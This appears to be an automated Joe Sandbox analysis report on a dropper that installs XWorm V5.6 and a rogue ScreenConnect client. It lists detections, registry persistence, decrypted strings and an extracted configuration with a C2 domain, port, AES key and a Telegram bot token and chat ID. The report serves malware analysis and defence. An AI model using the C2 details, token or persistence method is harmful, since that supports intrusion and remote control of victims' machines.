"?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c=", ProcessId: 3640, ProcessName: ScreenConnect.ClientService.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (37ec872757ed9eb0) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 4040, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-28A0-8D1AD2BB7546}\(Default)

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7064, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://login.live	Avira URL Cloud: Label: malware
Source: beshomandotestbesnd.run.place	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "beshomandotestbesnd.run.place"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "8195094601:AAH2whPA12KCVavUVhUNFLyB_HxLq2wTgM8", "Telegram Chatid": "7168737724", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	ReversingLabs: Detection: 63%
Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe	Virustotal: Detection: 59%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 90.1%

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 127.0.0.1,beshomandotestbesnd.run.place
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 7000
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: %LocalAppData%
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cmd.exe

Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_03FC0F08 CryptProtectData,	9_2_03FC0F08
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_03FC16F1 CryptProtectData,	9_2_03FC16F1
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_05AC007C CryptUnprotectData,	9_2_05AC007C
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_05AC0D40 CryptUnprotectData,	9_2_05AC0D40
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_05AC0072 CryptUnprotectData,	9_2_05AC0072

Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.4.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: System.ni.pdbRSDS source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.6.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.4.dr
Source:	Binary string: System.Core.pdb@ source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr
Source:	Binary string: System.Xml.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdb( source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004BCA000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1345857367.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.6.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000010.00000002.2476011004.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1345183979.000000001B092000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1340922647.0000000002761000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1340770610.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.4.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000009.00000000.1274135005.000000000072D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.4.dr
Source:	Binary string: mscorlib.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000006.00000003.1253348099.0000000004A40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004BBE000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.6.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1347089184.000000001B6B2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll.6.dr, ScreenConnect.Windows.dll.4.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.6.dr
Source:	Binary string: System.Management.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.6.dr
Source:	Binary string: System.Management.ni.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: System.Core.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.6.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: MSI49E0.tmp.4.dr, 4e450e.msi.4.dr, 4e450d.rbs.4.dr, MSI473E.tmp.4.dr, MSI475F.tmp.4.dr, 4e450c.msi.4.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1347089184.000000001B6B2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll.6.dr, ScreenConnect.Windows.dll.4.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.4.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.WindowsClient.exe.4.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1345010311.000000001B032000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.4.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.WindowsClient.exe.4.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: 4e450e.msi.4.dr, MSI41FF.tmp.3.dr, 4e450c.msi.4.dr, ex.msi.0.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1345010311.000000001B032000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.4.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.4.dr
Source:	Binary string: System.ni.pdb source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER4F0E.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER4F0E.tmp.dmp.14.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: d:
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 127.0.0.1
Source: Malware configuration extractor	URLs: beshomandotestbesnd.run.place

Enables network access during safeboot for specific services

Source: C:\Windows\System32\msiexec.exe

Registry value created: NULL Service

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: mail.cloudhelpdesk.cloud

Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4e450c.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{5DB4AB1A-07F1-053A-3398-B9E647E40642}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473E.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI475F.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI49E0.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4e450e.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4e450e.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{5DB4AB1A-07F1-053A-3398-B9E647E40642}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{5DB4AB1A-07F1-053A-3398-B9E647E40642}\DefaultIcon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{5DB4AB1A-07F1-053A-3398-B9E647E40642}.SchedServiceConfig.rmi	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (37ec872757ed9eb0)	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (37ec872757ed9eb0)\p2gbz4n4.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (37ec872757ed9eb0)\p2gbz4n4.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Source: C:\Windows\System32\msiexec.exe	File deleted: C:\Windows\Installer\MSI475F.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File deleted: C:\Windows\Installer\MSI49E0.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File deleted: C:\Windows\Installer\4e450e.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File deleted: C:\Windows\Installer\MSI473E.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File deleted: C:\Windows\Installer\4e450c.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File deleted: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	File deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (37ec872757ed9eb0)\p2gbz4n4.tmp	Jump to behavior

Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 2_2_00007FF88B206636	2_2_00007FF88B206636
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 2_2_00007FF88B202501	2_2_00007FF88B202501
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 2_2_00007FF88B201779	2_2_00007FF88B201779
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 2_2_00007FF88B2073E2	2_2_00007FF88B2073E2
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 2_2_00007FF88B202261	2_2_00007FF88B202261
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 2_2_00007FF88B2010FA	2_2_00007FF88B2010FA
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe	Code function: 9_2_0118D588	9_2_0118D588
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B21D26F	16_2_00007FF88B21D26F
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B2170FA	16_2_00007FF88B2170FA
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B21EE30	16_2_00007FF88B21EE30
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B2110CF	16_2_00007FF88B2110CF
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B2110D7	16_2_00007FF88B2110D7
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B21EE0D	16_2_00007FF88B21EE0D
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B21EE68	16_2_00007FF88B21EE68
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B526EFD	16_2_00007FF88B526EFD
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 16_2_00007FF88B525E61	16_2_00007FF88B525E61
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B22708A	19_2_00007FF88B22708A
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B22BB77	19_2_00007FF88B22BB77
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B22BB85	19_2_00007FF88B22BB85
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B22A0AD	19_2_00007FF88B22A0AD
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B2210CF	19_2_00007FF88B2210CF
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B2210D7	19_2_00007FF88B2210D7
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B220610	19_2_00007FF88B220610
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B536F75	19_2_00007FF88B536F75
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B542719	19_2_00007FF88B542719
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B53F2D2	19_2_00007FF88B53F2D2
Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe	Code function: 19_2_00007FF88B532980	19_2_00007FF88B532980

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dll EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dll FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA

Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000000.1227099826.0000000001568000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOutput.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exel% vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247617817.000000001C470000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exe.muiX vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247617817.000000001C470000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
